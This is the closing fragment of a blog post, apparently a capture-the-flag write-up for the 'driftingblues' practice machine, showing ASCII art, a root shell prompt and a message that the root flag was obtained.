░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

root@driftingblues:~# 

Successfully obtained the root flag!

posted @ 2022-11-19 19:58  Jason_huawen